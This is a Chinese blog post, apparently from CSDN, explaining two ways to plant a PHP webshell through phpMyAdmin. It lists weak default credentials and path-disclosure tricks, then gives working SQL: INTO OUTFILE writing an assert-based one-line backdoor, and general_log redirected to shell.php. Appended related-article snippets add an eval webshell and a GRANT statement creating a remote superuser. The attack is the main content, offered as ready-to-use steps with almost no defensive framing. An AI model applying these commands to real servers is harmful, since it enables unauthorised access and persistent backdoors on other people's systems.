php 调用shell读取mysql_phpMyAdmin拿shell的两种方法

最新推荐文章于 2024-04-21 12:26:02 发布
最新推荐文章于 2024-04-21 12:26:02 发布
阅读量189 收藏
点赞数
文章标签: php 调用shell读取mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33176326/article/details/113345461
版权

一.phpMyAdmin用户名和密码

1.如何获取phpMyAdmin用户名和密码:

弱口令

root/root

root/空密码

root/123456

phpMyAdmin爆破工具

信息泄露(配置文件等)

sql注入

等等

2.网站绝对路径,如何获取网站的绝对路径呢?

单引号爆绝对路径

xx.asp?id=1’

错误参数值爆绝对路径

xx.asp?id=-1

搜索引擎搜索绝对路径

site:xxx.com error

site:xxx.com warning

site:xxx.com fatal error

测试文件获取绝对路径

phpinfo.php

test.php

ceshi.php

info.php

php_info.php

等等

二.Phpmyadmin拿shell的两种方法

1.低版本Mysql

Mysql低于5.0,可以直接通过outfile写入:

SELECT "<?php @assert($_REQUEST["admin"]);?>" INTO OUTFILE '/网站绝对路径/shell.php'

2.高版本Mysql

(1)通过以下SQL语句可以查询secure_file_priv(secure-file-priv是全局变量,指定文件夹作为导出文件存放的地方,这个值是只读的)是否为null:

show variables like '%secure%'

从下图可以看到我的靶机secure_file_priv值为null:

b16b484e76a74325eab23e93f14a1e20.png

(2)通过以下SQL语句可以查询到日志保存状态(ON代表开启 OFF代表关闭)和日志的保存路径:

show variables like '%general%'

从下图可以看到我的靶机是关闭日志保存的,还有日志保存的路径在哪:

b3cf25b57d994570405c1c6448282549.png

(3)因此通过以下SQL语句修改general_log的值,开启日志保存:

set global general_log='on';

(4)通过以下SQL语句修改日志保存的路径(general_log_file值):

SET global general_log_file='/shell.php'

(5)再次执行以下SQL语句,查询是否成功更改:

show variables like '%general%'

从下图可以看到,成功通过SQL语句修改成功了:

6a7664218d5d2773dc1c1493b98793dc.png

(6)执行以下SQL语句,以下SQL语句将会被写入到日志文件(shell.php)中:

SELECT '<?php @assert($_REQUEST["admin"]);?>';

从下图可以看到一句话木马写入了日志文件中: 通过URL访问,成功被执行了! 图片

fceaa670db74635e1273f3ab1b58dfd4.png

(7)通过URL访问,成功被执行了!

784006dd0c105e1cc8e9a239a3fd66c6.png

莈莈
关注
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
网站后台getshell方法总结
L_lemo004的博客
07-12 6042
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张图片马...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
phpmyadminshell
华丽的贵族
10-29 246
secure_file_priv是一个全局变量,是指定文件夹作为导出文件存放的地方,默认情况是一个空置(NULL); 打开后用into outfile 等函数可以将一句话写入secure_file_priv目录下; 1.把secure_file_priv的值设置为网站根目录: set global secure_file_priv=‘C:\phpStudy/PHPTutorial/WWW’; //...
phpmyadmin getshell
YouthBelief的博客
11-11 5193
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
PhpMyadmin--getshell
qq_64664156的博客
09-20 709
phpMyAdmin通过MySQL日志文件getshell
php version 拿shell,总结PHPmyadminshell
weixin_39632379的博客
03-24 228
下面由phpmyadmin使用教程栏目给大家总结phpmyadminshell,希望对需要的朋友有所帮助!PHPmyadminshell总结PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' ID...
phpmyadmin里面导入sql语句格式的大量数据的方法
12-17
这段代码使用了PHP的`system`函数来执行shell命令,直接调用MySQL命令行客户端进行数据导入。代码如下: ```php <?php system("mysql -uroot -pmypassword database ); print "sql ok"; ?> ``` 在这段代码中: - `...
iredmail mysql 配置_Iredmail各大组件连接Mysql配置说明
weixin_42515392的博客
02-01 788
中文名为“艾瑞得邮件”,由 rhms 项目更名而来。是针对 Linux 设计的邮件服务器解决方案,是在操作系统安装好后使用的一套 shell 脚本,用于快速部署一套功能完善的邮件服务器解决方案。iRedMail谷歌开源地址:http://code.google.com/p/iredmail/iRedMail官网地址:http://www.iredmail.org/(国内被墙,鄙视之)iRedMai...
利用Shell脚本导出数据库表数据
Shell脚本是一种用于自动化操作系统任务的脚本语言,特别是在Unix/Linux系统中广泛使用。它可以让用户编写一系列命令,来完成复杂的操作,如数据导出。在本例中,'sql_out.sh'脚本就是用来自动化导出数据库表数据的...
phpmyadmin页面getshell
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
04-03 509
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法
登录phpmyadmin获取系统shell
R3332136304的博客
06-28 280
在对目标系统进行目录扫描时发现该web系统存在phpinfo信息泄露以及phpmyadmin管理后台 目录扫描工具为 dirsearch 访问 phpmyadmin 发现存在弱口令 root/root 由于 phpmyadmin 可以直接执行sql语句,所以想直接通过 phpmyadmin 执行 sql 语句读取文件以及写入 webshell。 执行 SHOW GLOBAL VARIABLES LIKE "%secure_file_priv%" 发现值为NULL,无写入读写文件权限。 mysql 数据库中
php网站怎么拿shell,phpmyadmin两种shell
weixin_39575758的博客
03-17 243
简介phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页...
利用phpmyadmin获得webshell
Mikasa
03-12 1601
这个是网上无意间找到的测试了一下竟然可用。。。嘿嘿嘿嘿嘿 1.利用Nmap扫描当前局域网网段上所有主机 nmap -sn -PE 192.168.1.0/24 ##扫描192.168.1网段上的所有主机 发现: 发现了不少于是,一个一个试试看打开了phpstudy没有,最终发现了一个: 竟然连探针都没删,暴露了物理地址!!!还可以试试phpinfo.php有没有删除。。还有进行...
phpmyadmin后台4种拿shell方法php爆路径收集
weixin_30367873的博客
08-31 1232
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
通过phpMyadmin后台获取shell(getshell
qq_46527080的博客
12-07 2697
通过phpMyadmin后台获取shell 前提: 1.要知道靶机的mysql用户名和密码 2.能成功登录到靶机phpmyadmin中 先登入对方phpmyadmin 然后找到执行sql语句的框架 1.开启日志 set global general_log='on' 2.指定日志写入的文件,就是一句话木马写入的路径 set global general_log_file ="C:/php/PHPTutorial/WWW/she.php" 注意:一定注意路径的斜杠一定是/不是复制的路径 查看靶机根目录,发
第三方应用类---Phpmyadmin 后台 Getshell 操作
最新发布
金灰的博客
04-21 539
以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.PhpMyAdmin_百度百科。
PHP学习笔记 PHP基本语法——PHP变量
关注我学习编程不迷路
06-13 227
PHP变量,PHP变量规则,PHP变量命名,PHP可变变量,PHP变量赋值,PHP变量作用域,全局变量与全局作用域,global与$GLOBALS,PHP预定义变量,PHP static:静态变量。PHP7 PHP基本语法,PHP PHP7学习教程。
PHPAdmin中的mysql乱码问题
weixin_30905981的博客
05-05 92
一次执行如下语句 show VARIABLES like 'character_%'; set character_set_server=utf8; show full columns from t_org; show table status from hrpa like '%t_%'; show charset; 发现表基本没问题了,也能回显UT...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值